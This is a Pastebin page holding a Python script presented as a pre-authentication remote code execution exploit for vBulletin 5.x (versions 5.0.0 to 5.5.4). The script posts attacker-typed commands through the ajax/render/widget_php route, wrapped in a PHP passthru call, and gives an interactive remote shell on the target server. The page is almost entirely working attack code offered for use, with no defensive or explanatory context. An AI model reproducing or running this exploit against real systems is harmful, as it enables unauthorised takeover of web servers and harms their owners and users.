Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #
- # vBulletin 5.x 0day pre-auth RCE exploit
- #
- # This should work on all versions from 5.0.0 till 5.5.4
- import requests
- import sys
- if len(sys.argv) != 2:
- sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
- params = {"routestring":"ajax/render/widget_php"}
- while True:
- try:
- cmd = raw_input("vBulletin$ ")
- params["widgetConfig[code]"] = "echo passthru('"+cmd+"'); exit;"
- r = requests.post(url = sys.argv[1], data = params)
- if r.status_code == 200:
- print r.text
- else:
- sys.exit("Exploit failed!")
- except KeyboardInterrupt:
- sys.exit("\nClosing shell...")
- except Exception, e:
- sys.exit(str(e))
Add Comment
Please, Sign In to add comment